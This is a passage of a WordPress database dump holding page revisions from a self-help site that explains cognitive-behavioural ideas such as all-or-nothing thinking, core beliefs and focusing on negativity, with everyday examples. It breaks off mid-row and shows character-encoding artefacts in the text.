/wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s brain does all or nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all or nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all or nothing thinking distorts how things really are, and this can make one make wrong judgments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic_thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-05-30 17:50:04', '2023-05-30 17:50:04', '', 1627, 'https://www.happythinking.com/?p=1630', 0, 'revision', '', 0),
(1632, 1, '2023-05-30 17:52:37', '2023-05-30 17:52:37', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs that one has about:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>oneself</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>other people</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>the world around you</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason I call them â€œcentral beliefs''''. (Many psychologists call such beliefs, â€œcore beliefsâ€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s central beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Central beliefs are the driving force of a person, and one''s mind tries its best to think in ways that â€œsupportâ€ such central beliefs. I call thoughts that support oneâ€™s central beliefs, â€œsupporting thoughtsâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For example, imagine that a person has the central belief, â€œI can learn new thingsâ€. For this central belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the central belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite central belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s central beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As central beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has central beliefs that truly represent oneself. You may now wonder how one can have central beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, central beliefs often start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having central beliefs that may not be truly logical. For example, imagine that a small child, who we will call Gaby, is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that Gabyâ€™s mother buys her an ice cream. Unfortunately, a few minutes later, imagine that Gaby accidentally drops the ice cream, and her mother, in a lapse of concentration, says, â€œYou are stupidâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Gaby, who does not have the mental maturity of an adult, may take this statement coming from her mother seriously and this may lead to the formation of the untrue central belief, â€œI am stupidâ€ in her mind.&nbsp; Now you might say, â€œSurely, when Gaby grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood central beliefs can remain unchanged in oneâ€™s mind and persist into adulthood. Itâ€™s almost as if oneâ€™s mind forgets that the central beliefs are from one''s childhood, and instead just â€œassumesâ€ that such beliefs must be true.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged untrue central beliefs that persist into adulthood can cause harm. In the case of Gaby, her childhood untrue central belief, â€œI am stupidâ€, may remain unchallenged with new logical thinking as she grows up and this could limit her potential as an adult. For example, this unchallenged untrue central belief may well dissuade Gaby from pursuing a university education. This would be a pity, because if she disregarded her untrue central belief, she may well have flourished in university.Â </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged untrue central beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult Gaby may not always be thinking â€œI am stupid.â€ But say, when Gaby thinks about applying for a university education, the â€œI am stupidâ€ untrue central belief may surface at that moment, and dissuade her from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Untrue central beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that untrue central beliefs are associated with â€œsupporting thoughtsâ€. If one cannot work out oneâ€™s untrue central beliefs, one may be able to recognise the supporting thoughts instead. For example, when thinking about her higher education, Gaby may not recognise the untrue central belief â€œI am stupidâ€, but instead, she may recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue central core beliefs can unnecessarily negatively affect oneâ€™s life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged untrue central beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change untrue central beliefs. For now, just remember the basic concept of central beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Untrue central beliefs', '', 'publish', 'closed', 'closed', '', 'negative-core-beliefs', '', '', '2023-08-09 18:25:27', '2023-08-09 18:25:27', '', 0, 'https://www.happythinking.com/?page_id=1632', 0, 'page', '', 0),
(1633, 1, '2023-05-30 17:52:37', '2023-05-30 17:52:37', '', 'Negative core beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-05-30 17:52:37', '2023-05-30 17:52:37', '', 1632, 'https://www.happythinking.com/?p=1633', 0, 'revision', '', 0),
(1636, 1, '2023-05-30 17:56:14', '2023-05-30 17:56:14', '<!-- wp:paragraph -->\n<p>As mentioned previously, unhelpful thinking patterns often involve ways of thinking that distort how things really are. The unhelpful thinking pattern that we will discuss on this page is called â€œall or nothing thinkingâ€ which means that one makes extreme judgments on various things, rather than making more balanced â€œin-betweenâ€ judgments. Most things in the world around you are not â€œextremeâ€. There is a good chance that the coffee or tea that you drink at the train station every day doesnâ€™t taste â€œextremely goodâ€ or â€œextremely badâ€. Rather, it is more likely to taste somewhere in between the two extremes. Similarly, your colleagues at your workplace are probably not â€œextremely friendlyâ€ or â€œextremely unfriendlyâ€, but more likely to be somewhere in between.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, one may develop a thinking pattern that involves one thinking in extremes (e.g. that coffee is extremely good, my colleagues are extremely bad etc), rather than seeing things in a more realistic â€œin-between wayâ€. Psychologists have named this thinking, â€œall or nothingâ€ thinking, where the word â€œallâ€ represents one extreme, and the word&nbsp; â€œnothingâ€ represents the other extreme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All or nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your brain does all or nothing thinking. Your brain will make you think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall or nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Sally to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all or nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent, but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s brain does all or nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all or nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all or nothing thinking distorts how things really are, and this can make one make wrong judgments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic_thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative_core_beliefs/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-05-30 17:56:14', '2023-05-30 17:56:14', '', 1627, 'https://www.happythinking.com/?p=1636', 0, 'revision', '', 0),
(1635, 1, '2023-05-30 17:55:19', '2023-05-30 17:55:19', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs one has about oneself, other people, and the world. For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason, are called â€œcore beliefsâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s core beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs are the driving force of a person, and one''s mind tries its best to think in ways that support such core beliefs. I call thoughts that support oneâ€™s core beliefs, â€œsupporting thoughtsâ€. For example, imagine that a person has the core belief, â€œI can learn new thingsâ€. For this core belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the core belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite core belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As core beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has core beliefs that truly represent oneself. You may now wonder how one can have core beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, core beliefs start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having core beliefs that may not be truly logical. For example, imagine that a small child is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that the mother buys ice cream for her child. Unfortunately, a few minutes later, imagine that the child accidentally drops the ice cream, and the mother, in a lapse of concentration, says, â€œYou are stupidâ€. While an adult in this situation would not consider herself to be seriously stupid just because one drops an ice cream, for a child, who does not have the mental maturity of an adult, this event, coming from her mother who she values, may be taken seriously, and lead to the formation of the negative core belief, â€œI am stupidâ€. Now you might say, â€œSurely, when this child grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood core beliefs can remain unchanged in the mind and persist into adulthood. This can happen because oneâ€™s mind may have not â€œbotheredâ€ to challenge those beliefs with new, more logical adult thinking. Such unchallenged negative core beliefs that persist into adulthood can cause harm. In the example of the child with the negative core belief, â€œI am stupidâ€, if this is not challenged with new thinking (i.e. adult logic), the adult may well continue with the same negative core belief, and that may well limit the potential of this adult. For example, this unchallenged negative core belief may well dissuade the adult from pursuing a university education. This would be a pity, because this negative core belief may well be untrue, and the person may well have flourished in university.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged negative core beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult person may not be always thinking â€œI am stupid.â€ But say, when this person thinks about applying for a university education, the â€œI am stupidâ€ negative core belief may surface at that moment, and dissuade the person from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that the mind also has â€œsupporting thoughtsâ€, that support core beliefs. If you cannot work out your core beliefs, you may be able to recognise the supporting thoughts instead. For example, when thinking about higher education, you may not recognise the negative core belief â€œI am stupidâ€, but instead, recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue negative core beliefs are â€œunhelpfulâ€ in your life. Analysing oneâ€™s unhelpful thinking patterns can suggest the hidden negative core beliefs in a person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged core beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change core beliefs. For now, just remember the basic concept of core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all_or_nothing_thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negative core beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-05-30 17:55:19', '2023-05-30 17:55:19', '', 1632, 'https://www.happythinking.com/?p=1635', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(2048, 1, '2023-08-06 15:50:35', '2023-08-06 15:50:35', '<!-- wp:paragraph -->\n<p>Letâ€™s now start getting to know the various types of unhelpful thinking that people do. The first one is what I call â€œfocusing on negativityâ€. This is a very common type of unhelpful thinking and is an important one to understand as it may contribute to one becoming depressed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In oneâ€™s day-to-day life, one faces various events. Some of these events may be â€œpositiveâ€ (e.g. one has been told that there will be a salary increase at work) and others may be â€œnegativeâ€ (e.g. one has lost oneâ€™s expensive mobile phone on the same day as the salary increase).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1829,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/twospheres_160623.jpg" alt="" class="wp-image-1829"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, oneâ€™s mind may excessively focus on negative events while mostly ignoring positive events. In the example I gave, the person may excessively focus on the negative event of losing the mobile phone, while mostly ignoring the â€œhappyâ€ event of having a salary increase. This type of negative thinking can make one feel that things are worse than they really are as positive events that could have countered the negativity are ignored. I call this type of negative thinking, â€œfocusing on negativityâ€ (psychologists will call it the â€œnegativity effectâ€).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1834,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unbalanced_160623.jpg" alt="" class="wp-image-1834"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A more â€œhelpfulâ€ way to think would be to see both the positive and negative events in a more balanced way. Perhaps thinking, â€œYes, itâ€™s upsetting that I lost my expensive mobile phone, but on the brighter side, I got a nice salary raise at workâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1835,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/balanced_160623.jpg" alt="" class="wp-image-1835"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>It is possible that the human brain has an inbuilt tendency to think in negative ways. This tendency may have been inherited from our ancestors from many thousands of years ago when they would have lived in forests. In such an environment, oneâ€™s survival would have depended on â€œrememberingâ€ negative events. For example, imagine that one of our ancestors was daydreaming and walking without a care in the world, and then accidentally stepped on a tigerâ€™s tail.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1857,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tigerouch_170623.jpg" alt="" class="wp-image-1857"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>If our ancestor survived the ensuing chase, it would have been in his or her survival interest to not forget the negative event of stepping on a tigerâ€™s tail. By focusing on this negative event, our ancestor would have kept remembering the importance of not daydreaming while walking in the forest! While nowadays most of us donâ€™t walk amongst tigers and other dangers in forests, the tendency to focus on negative events may still persist in our brains.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1858,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/tiger_memory_170623.jpg" alt="" class="wp-image-1858"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>Here is a more modern example of the â€œfocusing on negativityâ€ type of unhelpful thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Joe was to take an early morning flight, but unfortunately, because he forgot to set his alarm, he left very late for the airport. At the airport, the ticketing personnel conveyed the sad news to Joe that he had missed his flight. But luckily for Joe, a sympathetic senior manager of the airline felt sorry and issued a free ticket to him for a flight leaving for his destination just a few hours later. While waiting for this next flight, Joe only focussed on the negative event of missing his flight, rather than also taking in the positivity that the free ticket for the next flight gave him. He kept telling himself how unlucky he was to have forgotten to set his alarm clock while downplaying the good fortune he had of having a sympathetic airport worker who was able to help him in a big way. The excessive focus on the negative event made him unnecessarily feel very sad about his situation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>As you can see, to prevent unnecessary sadness, itâ€™s important to recognise when you are excessively focusing on negative events. As I mentioned before, Happy Thinking is about dealing with such unhelpful thinking. Once we have gone over the common types of unhelpful thinking, I will share with you tools that you can use to deal with such thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Focusing on Negativity', '', 'inherit', 'closed', 'closed', '', '1616-revision-v1', '', '', '2023-08-06 15:50:35', '2023-08-06 15:50:35', '', 1616, 'https://www.happythinking.com/?p=2048', 0, 'revision', '', 0),
(1998, 1, '2023-07-02 09:24:50', '2023-07-02 09:24:50', '<!-- wp:paragraph -->\n<p>As a monk, Tila had travelled far and wide, staying in many spiritual places, in search of bits of wisdom about how to be happy. He came to reside in my neighbourhood and I jumped at the chance to learn from his experiences. I made an appointment to meet him in his small room at the meditation centre where he was staying.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When I arrived at the meditation centre, I found Tila standing near the doorway to his room. He greeted me with a broad smile and asked me, â€œI forgot to ask you, what is your name?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œPrasanna, but I am happy for people to call me Pras.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œHow very interesting! Your name, in the ancient language of Sanskrit, actually means to be happy, and here you are visiting me to learn how to be happyâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>â€œI hope you will be able to make my name come true!â€, I genuinely said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Tila motioned me to enter his room, and as we entered, he asked, â€œSo you really want me to teach you how to be happy?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Somewhat startled by this direct question, all I could manage to say was, â€œYes!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>After guiding me to sit on a small sofa next to his bed, he spoke, â€œWell Pras, let us start at the beginning! What do you think is the meaning of happiness? What does it mean,â€˜to be happyâ€™ ?â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Despite desiring to be happy for so long, I suddenly realised that I never really had thought about what being happy actually meant.</p>\n<!-- /wp:paragraph 